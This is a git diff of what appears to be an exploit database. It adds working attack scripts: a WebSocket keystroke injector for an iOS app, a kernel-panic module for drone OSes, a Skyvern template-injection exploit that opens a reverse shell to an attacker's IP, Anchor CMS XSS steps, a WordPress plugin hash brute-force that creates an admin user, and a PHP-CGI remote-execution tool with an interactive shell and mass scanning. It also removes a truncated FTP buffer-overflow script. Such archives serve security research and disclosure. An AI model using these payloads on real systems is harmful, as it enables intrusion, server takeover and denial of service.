diff --git a/exploits/ios/remote/52333.py b/exploits/ios/remote/52333.py new file mode 100755 index 000000000..f2f01451f --- /dev/null +++ b/exploits/ios/remote/52333.py @@ -0,0 +1,61 @@ +# Exploit Title: AirKeyboard iOS App 1.0.5 - Remote Input Injection +# Date: 2025-06-13 +# Exploit Author: Chokri Hammedi +# Vendor Homepage: https://airkeyboardapp.com +# Software Link: https://apps.apple.com/us/app/air-keyboard/id6463187929 +# Version: Version 1.0.5 +# Tested on: iOS 18.5 with AirKeyboard app + + +''' +Description: + The AirKeyboard iOS application exposes a WebSocket server on port 8888 +which accepts arbitrary input injection messages from any client. + No authentication or pairing process is required. This allows any +attacker to type arbitrary keystrokes directly into the victim’s iOS device + in real-time without user interaction, resulting in full remote input +control. +''' + +import websocket +import json +import time + +target_ip = "192.168.8.101" +ws_url = f"ws://{target_ip}:8888" +text = "i'm hacker i can write on your keyboard :)" + +keystroke_payload = { + "type": 1, + "text": f"{text}", + "mode": 0, + "shiftKey": True, + "selectionStart": 1, + "selectionEnd": 1 +} + +def send_payload(ws): + print("[+] Sending remote keystroke...") + ws.send(json.dumps(keystroke_payload)) + time.sleep(1) + ws.close() + +def on_open(ws): + send_payload(ws) + +def on_error(ws, error): + print(f"[!] Error: {error}") + +def on_close(ws, close_status_code, close_msg): + print("[*] Connection closed") + +def exploit(): + print(f"[+] Connecting to AirKeyboard WebSocket on {target_ip}:8888") + ws = websocket.WebSocketApp(ws_url, + on_open=on_open, + on_error=on_error, + on_close=on_close) + ws.run_forever() + +if __name__ == "__main__": + exploit() \ No newline at end of file diff --git a/exploits/multiple/local/52329.py b/exploits/multiple/local/52329.py new file mode 100755 index 000000000..5eae557f0 --- /dev/null +++ b/exploits/multiple/local/52329.py @@ -0,0 +1,223 @@ +#!/usr/bin/env python3 +# Exploit Title: Parrot and DJI variants Drone OSes - Kernel Panic Exploit +# Author: Mohammed Idrees Banyamer +# Instagram: @banyamer_security +# GitHub: https://github.com/mbanyamer +# Date: 2025-06-10 +# Tested on: Parrot QRD, Parrot Alpha-M, DJI QRD, DJI Alpha-M +# CVE: CVE-2025-37928 +# Type: Local Privilege Escalation / Kernel Panic +# Platform: Linux-based drone OS (Parrot and DJI variants) +# Author Country: Jordan +# CVSS v3.1 Score: 7.3 (Important) +# Weakness: CWE-284: Improper Access Control +# Attack Vector: Local +# User Interaction: None +# Scope: Unchanged +# Confidentiality, Integrity, Availability Impact: High (Denial of Service via Kernel Panic) +# Exploit Code Maturity: Proof of Concept +# Remediation Level: Official Fix Available +# +# Description: +# This PoC triggers a kernel panic by calling schedule() inside an atomic context, +# exploiting CVE-2025-37928 present in certain Linux kernels running on +# Parrot QRD, Parrot Alpha-M, DJI QRD, and DJI Alpha-M drone operating systems. +# +# Steps of exploitation: +# 1. Check if running as root. +# 2. Verify kernel version vulnerability. +# 3. Detect drone type from system files. +# 4. Build and load vulnerable kernel module. +# 5. Trigger kernel panic by scheduling a tasklet calling schedule() in atomic context. +# +# Affected Drone Versions: +# - Parrot QRD +# - Parrot Alpha-M (DT) +# - DJI QRD +# - DJI Alpha-M (DT) +# +# ------------------------------------------------------------------------------ +# Usage: +# sudo python3 cve_2025_37928_tool.py [OPTIONS] +# +# Options: +# --dry-run Run detection & build only (no module loading) +# --force Force exploit even if kernel not detected as vulnerable +# --cleanup-only Remove the kernel module without triggering panic +# --verbose Enable detailed logging and debug output +# --help Show usage information +# +# Examples: +# sudo python3 cve_2025_37928_tool.py --dry-run +# sudo python3 cve_2025_37928_tool.py +# sudo python3 cve_2025_37928_tool.py --force +# sudo python3 cve_2025_37928_tool.py --cleanup-only +# +# Warning: +# This PoC causes an immediate kernel panic. +# Use it ONLY in isolated and controlled environments (e.g., lab tests). +# ------------------------------------------------------------------------------ + +import os +import sys +import subprocess +import tempfile +import argparse +import shutil +import platform + +MODULE_NAME = "cve_2025_37928_poc" +C_FILENAME = MODULE_NAME + ".c" +KO_FILENAME = MODULE_NAME + ".ko" + +KERNEL_MODULE_CODE = r''' +#include +#include +#include +#include +#include + +MODULE_LICENSE("GPL"); +MODULE_AUTHOR("PoC Author"); +MODULE_DESCRIPTION("PoC for CVE-2025-37928: schedule() in atomic context causes kernel panic"); + +static void trigger_panic_tasklet(unsigned long data) +{ + pr_alert("[CVE-2025-37928] Executing schedule() inside atomic context. This will panic!\n"); + schedule(); // This causes kernel panic +} + +DECLARE_TASKLET(my_tasklet, trigger_panic_tasklet, 0); + +static int __init poc_init(void) +{ + pr_info("[CVE-2025-37928] Loading PoC module and scheduling tasklet...\n"); + tasklet_schedule(&my_tasklet); + return 0; +} + +static void __exit poc_exit(void) +{ + tasklet_kill(&my_tasklet); + pr_info("[CVE-2025-37928] PoC module unloaded\n"); +} + +module_init(poc_init); +module_exit(poc_exit); +''' + +MAKEFILE_CONTENT = f''' +obj-m += {MODULE_NAME}.o + +all: +\tmake -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules + +clean: +\tmake -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean +''' + +def check_root(): + if os.geteuid() != 0: + print("[-] Must be run as root.") + sys.exit(1) + +def detect_kernel(): + version = platform.release() + vulnerable_versions = ["5.10", "5.15", "6.0"] + vulnerable = any(v in version for v in vulnerable_versions) + print(f"[i] Kernel version: {version} => {'VULNERABLE' if vulnerable else 'UNKNOWN/SAFE'}") + return vulnerable + +def detect_drone_type(): + print("[*] Detecting drone type...") + files = ["/etc/drone_type", "/proc/device-tree/model", "/sys/firmware/devicetree/base/model"] + found = [] + for path in files: + if os.path.exists(path): + try: + with open(path, "r") as f: + content = f.read().strip() + if any(x in content for x in ["Parrot", "DJI"]): + found.append(content) + except: + continue + if found: + for d in found: + print(f" [i] Found: {d}") + else: + print(" [!] No drone ID found.") + return found + +def write_module(tempdir): + c_path = os.path.join(tempdir, C_FILENAME) + makefile_path = os.path.join(tempdir, "Makefile") + with open(c_path, "w") as f: + f.write(KERNEL_MODULE_CODE) + with open(makefile_path, "w") as f: + f.write(MAKEFILE_CONTENT) + return c_path + +def build_module(tempdir): + print("[*] Building module...") + result = subprocess.run(["make"], cwd=tempdir, capture_output=True, text=True) + if result.returncode != 0: + print("[-] Build failed:\n", result.stderr) + sys.exit(1) + print("[+] Build successful.") + return os.path.join(tempdir, KO_FILENAME) + +def load_module(ko_path): + print("[*] Loading kernel module...") + result = subprocess.run(["insmod", ko_path], capture_output=True, text=True) + if result.returncode != 0: + print("[-] insmod failed:\n", result.stderr) + sys.exit(1) + print("[!] Module loaded. Kernel panic should occur if vulnerable.") + +def unload_module(): + print("[*] Attempting to remove module...") + subprocess.run(["rmmod", MODULE_NAME], stderr=subprocess.DEVNULL) + print("[+] Module removal attempted.") + +def clean_build(tempdir): + subprocess.run(["make", "clean"], cwd=tempdir, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) + +def main(): + parser = argparse.ArgumentParser(description="CVE-2025-37928 Kernel Panic Exploit Tool for Drone OSes") + parser.add_argument("--dry-run", action="store_true", help="Only simulate and check environment, no exploitation") + parser.add_argument("--force", action="store_true", help="Force execution even if version unknown") + parser.add_argument("--cleanup-only", action="store_true", help="Just remove kernel module if loaded") + + args = parser.parse_args() + check_root() + + if args.cleanup_only: + unload_module() + return + + vulnerable = detect_kernel() + detect_drone_type() + + if not vulnerable and not args.force: + print("[-] Kernel not identified as vulnerable. Use --force to override.") + sys.exit(1) + + if args.dry_run: + print("[*] Dry run mode. Exiting before exploitation.") + return + + with tempfile.TemporaryDirectory() as tempdir: + print(f"[*] Working directory: {tempdir}") + write_module(tempdir) + ko_path = build_module(tempdir) + + try: + load_module(ko_path) + except KeyboardInterrupt: + print("[!] Interrupted. Attempting cleanup...") + finally: + unload_module() + clean_build(tempdir) + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/multiple/webapps/52335.py b/exploits/multiple/webapps/52335.py new file mode 100755 index 000000000..a97feadf2 --- /dev/null +++ b/exploits/multiple/webapps/52335.py @@ -0,0 +1,119 @@ +# Exploit Title: Skyvern 0.1.85 - Remote Code Execution (RCE) via SSTI +# Date: 2025-06-15 +# Exploit Author: Cristian Branet +# Vendor Homepage: https://www.skyvern.com/ +# Software Link: https://github.com/Skyvern-AI/skyvern +# Version: < 0.1.85, before commit db856cd +# Tested on: Skyvern Cloud app / Local Skyvern (Linux Ubuntu 22.04) +# CVE : CVE-2025-49619 +# Article: https://cristibtz.github.io/posts/CVE-2025-49619/ + +''' +Skyvern's Workflow Editor allows prompt injection via Jinja2 template syntax. +An attacker with low privileges can inject a malicious payload in a block that contains Prompt section, +which gets rendered server-side, resulting in blind remote code execution via curl. +''' + +import requests, argparse, pyfiglet + +parser = argparse.ArgumentParser(description="This script exploits CVE-2025-49619 in Skyvern to execute a reverse shell command.", formatter_class=argparse.ArgumentDefaultsHelpFormatter) +parser.add_argument("-u", "--url", required=True, help="Skyvern URL (e.g., http://example.com:8080)") +parser.add_argument("-k", "--x-api-key", required=True, help="Go to Skyvern app -> Settings -> API Key -> Reveal and copy the API key") +parser.add_argument("-i", "--ip", required=True, help="IP address to receive the reverse shell connection") +parser.add_argument("-p", "--port", required=True, help="Port for the reverse shell connection") + +def create_exploit_workflow(url, ip, port, x_api_key): + exploit_workflow = { + "title": "Exploit", + "description": "", + "proxy_location": "RESIDENTIAL", + "webhook_callback_url": "", + "persist_browser_session": False, + "model": None, + "totp_verification_url": None, + "workflow_definition": { + "parameters": [], + "blocks": [ + { + "label": "block_1", + "continue_on_failure": False, + "block_type": "task_v2", + "prompt": ( + "{% for x in ().__class__.__base__.__subclasses__() %}\n" + " {% if 'warning' in x.__name__ %}\n" + " {{ x()._module.__builtins__['__import__']('os').popen(\n" + " \"python3 -c 'import socket,os,pty;\"\n" + " \"s=socket.socket();\"\n" + f" \'s.connect((\\\"{ip}\\\",{port}));\'\n" + " \"os.dup2(s.fileno(),0);\"\n" + " \"os.dup2(s.fileno(),1);\"\n" + " \"os.dup2(s.fileno(),2);\"\n" + " \"pty.spawn(\\\"sh\\\")'\"\n" + " ).read() }}\n" + " {% endif %}\n" + "{% endfor %}" + ), + "url": "", + "max_steps": 25, + "totp_identifier": None, + "totp_verification_url": None + } + ] + }, + "is_saved_task": False + } + + headers = { + "Content-Type": "application/json", + "X-API-Key": x_api_key + } + response = requests.post(f"{url}/api/v1/workflows", json=exploit_workflow, headers=headers) + + if response.status_code == 200: + print("[+] Exploit workflow created successfully!") + else: + print("[-] Failed to create exploit workflow:", response.text) + return None + + workflow_permanent_id = response.json().get("workflow_permanent_id") + + print(f"[+] Workflow Permanent ID: {workflow_permanent_id}") + + return workflow_permanent_id + +def run_exploit_workflow(url, x_api_key, workflow_permanent_id): + + workflow_data = { + "workflow_id": workflow_permanent_id + } + + headers = { + "Content-Type": "application/json", + "X-API-Key": x_api_key + } + response = requests.post(f"{url}/api/v1/workflows/{workflow_permanent_id}/run", json=workflow_data, headers=headers) + + if response.status_code == 200: + print("[+] Exploit workflow executed successfully!") + else: + print("[-] Failed to execute exploit workflow:", response.text) + + +if __name__=="__main__": + + print("\n") + print(pyfiglet.figlet_format("CVE-2025-49619 PoC", font="small", width=100)) + print("Author: Cristian Branet") + print("GitHub: github.com/cristibtz") + print("Description: This script exploits CVE-2025-49619 in Skyvern to execute a reverse shell command.") + print("\n") + + args = parser.parse_args() + url = args.url + x_api_key = args.x_api_key + ip = args.ip + port = args.port + + workflow_permanent_id = create_exploit_workflow(url, ip, port, x_api_key) + + run_exploit_workflow(url, x_api_key, workflow_permanent_id) \ No newline at end of file diff --git a/exploits/php/webapps/52147.NA b/exploits/php/webapps/52147.NA deleted file mode 100644 index b35f96ea1..000000000 --- a/exploits/php/webapps/52147.NA +++ /dev/null @@ -1,39 +0,0 @@ -# Exploit Title: Anchor CMS 0.12.7 - Stored Cross Site Scripting (XSS) -# Date: 04/28/2024 -# Exploit Author: Ahmet Ümit BAYRAM -# Vendor Homepage: https://anchorcms.com/ -# Software Link: -https://github.com/anchorcms/anchor-cms/archive/refs/tags/0.12.7.zip -# Version: latest -# Tested on: MacOS - -# Log in to Anchor CMS. -# Click on "Create New Post". -# Fill in the "Title" and enter the following payload in the field -immediately below: -# "> -# Go to the homepage, and you will see the alert! - - -### PoC Request ### - -POST /anchor/admin/posts/edit/2 HTTP/1.1 -Host: 127.0.0.1 -User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) -Gecko/20100101 Firefox/124.0 -Accept: */* -Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 -Accept-Encoding: gzip, deflate, br -X-Requested-With: XMLHttpRequest -Content-Type: application/x-www-form-urlencoded -Content-Length: 278 -Origin: http://127.0.0.1 -Connection: close -Referer: http://127.0.0.1/anchor/admin/posts/edit/2 -Cookie: PHPSESSID=8d8apa3ko6alt5t6jko2e0mrta; -anchorcms=hlko7b1dbdpjgn58himf2obht5 -Sec-Fetch-Dest: empty -Sec-Fetch-Mode: cors -Sec-Fetch-Site: same-origin - -token=OqyPlxKQyav5KQYMbSErNCqjIfCoUGS9GZA3y3ZpnshDgb8IL8vH3kioFIKsO9Kf&title=test&markdown=%22%3E%3Cscript%3Ealert()%3C%2Fscript%3E&slug=aaaa&created=2024-04-28+12%3A20%3A36&description=&status=published&category=1&css=&js=%22%3E%3Cscript%3Ealert()%3C%2Fscript%3E&autosave=false \ No newline at end of file diff --git a/exploits/php/webapps/52327.txt b/exploits/php/webapps/52327.txt new file mode 100644 index 000000000..1a70554db --- /dev/null +++ b/exploits/php/webapps/52327.txt @@ -0,0 +1,27 @@ +# Exploit Title: Anchor CMS 0.12.7 - Stored Cross Site Scripting (XSS) +# Google Dork: inurl:"/admin/pages/add" "Anchor CMS" +# Date: 2025-06-08 +# Exploit Author: /bin/neko +# Vendor Homepage: http://anchorcms.com +# Software Link: https://github.com/anchorcms/anchor-cms +# Version: 0.12.7 +# Tested on: Ubuntu 22.04 + Apache2 + PHP 8.1 +# CVE: CVE-2025-46041 + +# Description: +Anchor CMS v0.12.7 suffers from a stored Cross-Site Scripting (XSS) vulnerability +in the `markdown` field of the /admin/pages/add page. +An authenticated user with page creation privileges can inject arbitrary JavaScript, +which is stored and executed when the page is viewed. + +# Steps to Reproduce: +1. Login to /admin +2. Navigate to Pages > Add Page +3. In the `Markdown` field, insert: + +4. Save the page. +5. View the created page. The script executes. + +# Impact: +- Arbitrary JavaScript execution +- Potential session hijacking or admin impersonation \ No newline at end of file diff --git a/exploits/php/webapps/52328.py b/exploits/php/webapps/52328.py new file mode 100755 index 000000000..20a8f8922 --- /dev/null +++ b/exploits/php/webapps/52328.py @@ -0,0 +1,129 @@ +# Exploit Title: Litespeed Cache WordPress Plugin 6.3.0.1 - Privilege Escalation +# Date: 2025-06-10 +# Exploit Author: Milad Karimi (Ex3ptionaL) +# Contact: miladgrayhat@gmail.com +# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL +# Country: United Kingdom +# CVE : CVE-2024-28000 + + +import requests +import random +import string +import concurrent.futures + +# Configuration +target_url = 'http://example.com' +rest_api_endpoint = '/wp-json/wp/v2/users' +ajax_endpoint = '/wp-admin/admin-ajax.php' +admin_user_id = '1' +num_hash_attempts = 1000000 +num_workers = 10 +new_username = 'newadminuser' # Replace with desired username +new_user_password = 'NewAdminPassword123!' # Replace with a secure password + +def mt_srand(seed=None): + """ + Mimics PHP's mt_srand function by setting the seed for random number +generation. + """ + random.seed(seed) + +def mt_rand(min_value=0, max_value=2**32 - 1): + """ + Mimics PHP's mt_rand function by generating a random number within the +specified range. + """ + return random.randint(min_value, max_value) + +def generate_random_string(length=6): + """ + Generates a random string based on the output of mt_rand. + """ + chars = string.ascii_letters + string.digits + return ''.join(random.choices(chars, k=length)) + +def trigger_hash_generation(): + payload = { + 'action': 'async_litespeed', + 'litespeed_type': 'crawler' + } + try: + response = requests.post(f'{target_url}{ajax_endpoint}', +data=payload) + if response.status_code == 200: + print('[INFO] Triggered hash generation.') + else: + print(f'[ERROR] Failed to trigger hash generation - Status +code: {response.status_code}') + except requests.RequestException as e: + print(f'[ERROR] AJAX request failed: {e}') + +def attempt_hash(hash_value): + cookies = { + 'litespeed_hash': hash_value, + 'litespeed_role': admin_user_id + } + try: + response = requests.post(f'{target_url}{rest_api_endpoint}', +cookies=cookies) + return response, cookies + except requests.RequestException as e: + print(f'[ERROR] Request failed: {e}') + return None, None + +def create_admin_user(cookies): + user_data = { + 'username': new_username, + 'password': new_user_password, + 'email': f'{new_username}@example.com', + 'roles': ['administrator'] + } + try: + response = requests.post(f'{target_url}{rest_api_endpoint}', +cookies=cookies, json=user_data) + if response.status_code == 201: + print(f'[SUCCESS] New admin user "{new_username}" created +successfully!') + else: + print(f'[ERROR] Failed to create admin user - Status code: +{response.status_code} - Response: {response.text}') + except requests.RequestException as e: + print(f'[ERROR] User creation request failed: {e}') + +def worker(): + for _ in range(num_hash_attempts // num_workers): + random_string = generate_random_string() + print(f'[DEBUG] Trying hash: {random_string}') + + response, cookies = attempt_hash(random_string) + + if response is None: + continue + + print(f'[DEBUG] Response status code: {response.status_code}') + print(f'[DEBUG] Response content: {response.text}') + + if response.status_code == 201: + print(f'[SUCCESS] Valid hash found: {random_string}') + create_admin_user(cookies) + return + elif response.status_code == 401: + print(f'[FAIL] Invalid hash: {random_string}') + else: + print(f'[ERROR] Unexpected response for hash: {random_string} - +Status code: {response.status_code}') + +def main(): + # Seeding the random number generator (mimicking mt_srand) + mt_srand() + + trigger_hash_generation() + + with concurrent.futures.ThreadPoolExecutor(max_workers=num_workers) as +executor: + futures = [executor.submit(worker) for _ in range(num_workers)] + concurrent.futures.wait(futures) + +if __name__ == '__main__': + main() \ No newline at end of file diff --git a/exploits/php/webapps/52331.py b/exploits/php/webapps/52331.py new file mode 100755 index 000000000..683d64add --- /dev/null +++ b/exploits/php/webapps/52331.py @@ -0,0 +1,296 @@ +#!/usr/bin/env python3 + +# Exploit Title: PHP CGI Module 8.3.4 - Remote Code Execution (RCE) +# Date: 2025-06-13 +# Exploit Author: @ibrahimsql +# Exploit Author's github: https://github.com/yigitsql ( old account banned ) +# Vendor Homepage: https://www.php.net/ +# Software Link: https://www.php.net/downloads +# Version: PHP < 8.3.4, PHP < 8.2.17, PHP < 8.1.27 +# Tested on: Kali Linux 2024.1 +# CVE: CVE-2024-4577 +# Description: +# A critical vulnerability in PHP's CGI implementation allows remote attackers to execute +# arbitrary code through command injection. The vulnerability exists due to improper handling +# of command-line arguments in PHP CGI, which can be exploited to bypass security restrictions +# and execute arbitrary commands with the privileges of the web server. This vulnerability +# affects all PHP versions before 8.3.4, 8.2.17, and 8.1.27. +# +# Impact: +# - Remote Code Execution (RCE) +# - Information Disclosure +# - Server Compromise +# +# References: +# - https://nvd.nist.gov/vuln/detail/cve-2024-4577 +# - https://www.akamai.com/blog/security-research/2024-php-exploit-cve-one-day-after-disclosure +# - https://www.tarlogic.com/blog/cve-2024-4577-critical-vulnerability-php/ +# - https://learn.microsoft.com/en-us/answers/questions/1725847/php-8-3-vulnerability-cve-2024-4577 +# - https://www.stormshield.com/news/security-alert-php-cve-2024-4577-stormshields-product-response/ +# +# Requirements: urllib3>=1.26.0, rich, requests>=2.25.0, alive_progress, concurrent.futures + +import re +import sys +import base64 +import requests +import argparse +from rich.console import Console +from urllib3 import disable_warnings +from urllib3.exceptions import InsecureRequestWarning +from alive_progress import alive_bar +from concurrent.futures import ThreadPoolExecutor, as_completed + +disable_warnings(InsecureRequestWarning) + +console = Console() + +class PHPCGIExploit: + """CVE-2024-4577 PHP CGI Argument Injection RCE Exploit""" + + def __init__(self): + self.headers = { + "Content-Type": "application/x-www-form-urlencoded", + "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" + } + + # Optimized settings for PHP CGI argument injection + self.php_settings = [ + "-d cgi.force_redirect=0", + "-d cgi.redirect_status_env=0", + "-d fastcgi.impersonate=1", + "-d open_basedir=", + "-d disable_functions=", + "-d auto_prepend_file=php://input", + "-d allow_url_include=1", + "-d allow_url_fopen=1" + ] + + # Soft hyphen character for Windows systems + self.soft_hyphen = "%AD" # 0xAD character + + # Different PHP CGI paths to try + self.cgi_paths = [ + "/php-cgi/php-cgi.exe", + "/php/php-cgi.exe", + "/cgi-bin/php-cgi.exe", + "/php-cgi.exe", + "/php.exe", + "/php/php.exe" + ] + + def ascii_art(self): + print("") + console.print("[bold red] ____ _ _ ____ ____ ____ ___[/bold red]") + console.print("[bold red] | _ \| | | | _ \ / ___|/ ___|_ _|[/bold red]") + console.print("[bold red] | |_) | |_| | |_) | | | | | _ | |[/bold red]") + console.print("[bold red] | __/| _ | __/ | |___| |_| || |[/bold red]") + console.print("[bold red] |_| |_| |_|_| \____|\____|___|[/bold red]") + console.print("[bold yellow] CVE-2024-4577 Exploit[/bold yellow]") + console.print("[dim white] PHP CGI Argument Injection[/dim white]") + console.print("[dim cyan] Developer: @ibrahimsql[/dim cyan]") + print("") + + def build_payload_url(self, cgi_path): + # Argument injection with soft hyphen + settings_str = " ".join(self.php_settings).replace("-", self.soft_hyphen) + settings_str = settings_str.replace("=", "%3D").replace(" ", "+") + return f"{cgi_path}?{settings_str}" + + def execute_command(self, target, command="whoami", cgi_path=None): + """Execute command on target using PHP CGI argument injection""" + try: + # Create PHP code + php_code = f"""""" + + # If no CGI path specified, try all paths + if cgi_path: + paths_to_try = [cgi_path] + else: + paths_to_try = self.cgi_paths + + for path in paths_to_try: + try: + payload_url = self.build_payload_url(path) + full_url = f"{target.rstrip('/')}{payload_url}" + + response = requests.post( + full_url, + headers=self.headers, + data=php_code, + timeout=10, + verify=False, + allow_redirects=False + ) + + # Check output + if response.status_code == 200: + output_match = re.search(r'\[START\](.*?)\[END\]', response.text, re.DOTALL) + if output_match: + return output_match.group(1).strip(), path + + except requests.exceptions.RequestException: + continue + + return None, None + + except Exception as e: + console.print(f"[red][-][/red] Error: {str(e)}") + return None, None + + def check_vulnerability(self, target): + """Check if target is vulnerable""" + console.print(f"[blue][*][/blue] Testing target: {target}") + + # Test with a simple command + result, cgi_path = self.execute_command(target, "echo CVE-2024-4577-TEST") + + if result and "CVE-2024-4577-TEST" in result: + console.print(f"[green][+][/green] Target is vulnerable! CGI Path: {cgi_path}") + + # Get system information + sys_info, _ = self.execute_command(target, "systeminfo", cgi_path) + if sys_info: + console.print("[green][+][/green] System Information:") + console.print(f"[dim]{sys_info[:500]}...[/dim]") # First 500 characters + + return True, cgi_path + else: + console.print(f"[red][-][/red] Target is not vulnerable") + return False, None + + def interactive_shell(self, target, cgi_path): + """Interactive shell session - Simple version""" + console.print("[green][+][/green] Interactive shell opened") + console.print("[yellow][!][/yellow] Type 'exit' to quit, 'clear' to clear screen") + + while True: + try: + # Simple input prompt + cmd = input("shell> ") + + if cmd.lower() == "exit": + break + elif cmd.lower() == "clear": + print("\033[2J\033[H", end="") + continue + elif cmd.strip() == "": + continue + + # Execute command + result, _ = self.execute_command(target, cmd, cgi_path) + + if result: + print(result) + else: + console.print("[red][-][/red] Command execution failed") + + except KeyboardInterrupt: + console.print("\n[yellow][!][/yellow] Use 'exit' to quit") + except Exception as e: + console.print(f"[red][-][/red] Error: {str(e)}") + + def exploit_target(self, target, output_file=None): + """Exploit single target""" + is_vulnerable, cgi_path = self.check_vulnerability(target) + + if is_vulnerable: + # Save results + if output_file: + with open(output_file, "a") as f: + f.write(f"[+] Vulnerable: {target} | CGI Path: {cgi_path}\n") + + # Start interactive shell + console.print("[blue][*][/blue] Starting interactive shell...") + self.interactive_shell(target, cgi_path) + else: + if output_file: + with open(output_file, "a") as f: + f.write(f"[-] Not vulnerable: {target}\n") + + def scan_multiple_targets(self, targets_file, threads=5, output_file=None): + """Scan multiple targets""" + try: + with open(targets_file, "r") as f: + targets = [line.strip() for line in f if line.strip()] + + if not targets: + console.print("[red][-][/red] No targets found in file") + return + + console.print(f"[blue][*][/blue] Scanning {len(targets)} targets with {threads} threads") + + vulnerable_targets = [] + + def scan_target(target): + try: + is_vulnerable, cgi_path = self.check_vulnerability(target) + if is_vulnerable: + vulnerable_targets.append((target, cgi_path)) + if output_file: + with open(output_file, "a") as f: + f.write(f"[+] Vulnerable: {target} | CGI Path: {cgi_path}\n") + except Exception as e: + console.print(f"[red][-][/red] Error scanning {target}: {str(e)}") + + with alive_bar(len(targets), title="Scanning", bar="smooth") as bar: + with ThreadPoolExecutor(max_workers=threads) as executor: + futures = [executor.submit(scan_target, target) for target in targets] + for future in as_completed(futures): + future.result() + bar() + + # Summary + print("") + console.print(f"[green][+][/green] Found {len(vulnerable_targets)} vulnerable targets") + + if vulnerable_targets: + console.print("\n[bold]Vulnerable Targets:[/bold]") + for target, cgi_path in vulnerable_targets: + console.print(f" [green]•[/green] {target} (CGI: {cgi_path})") + + except FileNotFoundError: + console.print(f"[red][-][/red] File not found: {targets_file}") + except Exception as e: + console.print(f"[red][-][/red] Error: {str(e)}") + +def main(): + """Main function""" + exploit = PHPCGIExploit() + exploit.ascii_art() + + parser = argparse.ArgumentParser( + description="CVE-2024-4577 - PHP CGI Argument Injection RCE Exploit", + formatter_class=argparse.RawDescriptionHelpFormatter, + epilog=""" +Examples: + python3 exploit.py -u http://target.com + python3 exploit.py -f targets.txt -t 10 -o results.txt + +Note: This tool is for educational and authorized testing purposes only. + """ + ) + + parser.add_argument("-u", "--url", help="Single target URL") + parser.add_argument("-f", "--file", help="File containing target URLs") + parser.add_argument("-o", "--output", help="Output file for results") + parser.add_argument("-t", "--threads", type=int, default=5, help="Number of threads (default: 5)") + + args = parser.parse_args() + + if args.url: + exploit.exploit_target(args.url, args.output) + elif args.file: + exploit.scan_multiple_targets(args.file, args.threads, args.output) + else: + parser.print_help() + sys.exit(1) + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/windows/local/52332.txt b/exploits/windows/local/52332.txt new file mode 100644 index 000000000..ac7212c09 --- /dev/null +++ b/exploits/windows/local/52332.txt @@ -0,0 +1,67 @@ +# Titles: Microsoft Excel Use After Free - Local Code Execution +# Author: nu11secur1ty +# Date: 06/09/2025 +# Vendor: Microsoft +# Software: https://www.microsoft.com/en/microsoft-365/excel?market=af +# Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-27751 +# Versions: MS Excel 2016, MS Office Online Server KB5002699 +# CVE-2025-27751 + +## Description: +The attacker can trick any user into opening and executing their code by +sending a malicious DOCX file via email or a streaming server. +After the execution of the victim, his machine can be infected or even +worse than ever; this could be the end of his Windows machine! + +STATUS: HIGH-CRITICAL Vulnerability + + +[+]Exploit: + +``` +Sub hello() +Dim Program As String +Dim TaskID As Double +On Error Resume Next +--------------------------------------- +Program = "WRITE YOUR OWN EXPLOIT HERE" +TaskID = ...YOUR TASK HERE... +--------------------------------------- +If Err <> 0 Then +MsgBox "Can't start " & Program +End If +End Sub +``` + +# Reproduce: +[href](https://www.youtube.com/watch?v=ArI0ZeChYE4) + +# Buy an exploit only: +[href](https://satoshidisk.com/pay/COb5oS) + +# Time spent: +00:35:00 + + +-- +System Administrator - Infrastructure Engineer +Penetration Testing Engineer +Exploit developer at https://packetstormsecurity.com/ +https://cve.mitre.org/index.html +https://cxsecurity.com/ and https://www.exploit-db.com/ +0day Exploit DataBase https://0day.today/ +home page: https://www.nu11secur1ty.com/ +hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= + nu11secur1ty + +-- + +System Administrator - Infrastructure Engineer +Penetration Testing Engineer +Exploit developer at https://packetstorm.news/ +https://cve.mitre.org/index.html +https://cxsecurity.com/ and https://www.exploit-db.com/ +0day Exploit DataBase https://0day.today/ +home page: https://www.nu11secur1ty.com/ +hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= + nu11secur1ty \ No newline at end of file diff --git a/exploits/windows/remote/26471.NA b/exploits/windows/remote/26471.NA deleted file mode 100644 index 6e6c0a69a..000000000 --- a/exploits/windows/remote/26471.NA +++ /dev/null @@ -1,129 +0,0 @@ -#!/usr/bin/env python - -import signal -from time import sleep -from socket import * -from sys import exit, exc_info - -# -# Title************************PCMan FTP Server v2.0.7 Remote Root Shell Exploit - USER Command -# Discovered and Reported******June 2013 -# Discovered/Exploited By******Jacob Holcomb/Gimppy, Security Analyst @ Independent Security Evaluators -# Exploit/Advisory*************http://infosec42.blogspot.com/ -# Software*********************PCMan FTP Server v2.0.7 (Listens on TCP/21) -# Tested Commands*************USER (Other commands were not tested and may be vulnerable) -# CVE**************************PCMan FTP Server v2.0.7 Buffer Overflow: Pending -# - - -def sigHandle(signum, frm): # Signal handler - - print "\n[!!!] Cleaning up the exploit... [!!!]\n" - sleep(1) - exit(0) - - -def targServer(): - - while True: - try: - server = inet_aton(raw_input("\n[*] Please enter the IPv4 address of the PCMan FTP Server:\n\n>")) - server = inet_ntoa(server) - break - except: - print "\n\n[!!!] Error: Please enter a valid IPv4 address. [!!!]\n\n" - sleep(1) - continue - - return server - - -def main(): - - print ("""\n [*] Title************************PCMan FTP Server v2.0.7 Remote Root Shell Exploit - USER Command - [*] Discovered and Reported******June 2013 - [*] Discovered/Exploited By******Jacob Holcomb/Gimppy, Security Analyst @ Independent Security Evaluators - [*] Exploit/Advisory*************http://infosec42.blogspot.com/ - [*] Software*********************PCMan FTP Server v2.0.7 (Listens on TCP/21) - [*] Tested Commands*************USER (Other commands were not tested and may be vulnerable) - [*] CVE**************************PCMan FTP Server v2.0.7 Buffer Overflow: Pending""") - signal.signal(signal.SIGINT, sigHandle) #Setting signal handler for ctrl + c - victim = targServer() - port = int(21) - Cmd = "USER " #Vulnerable command - JuNk = "\x42" * 2004 - # KERNEL32.dll 7CA58265 - JMP ESP - ret = 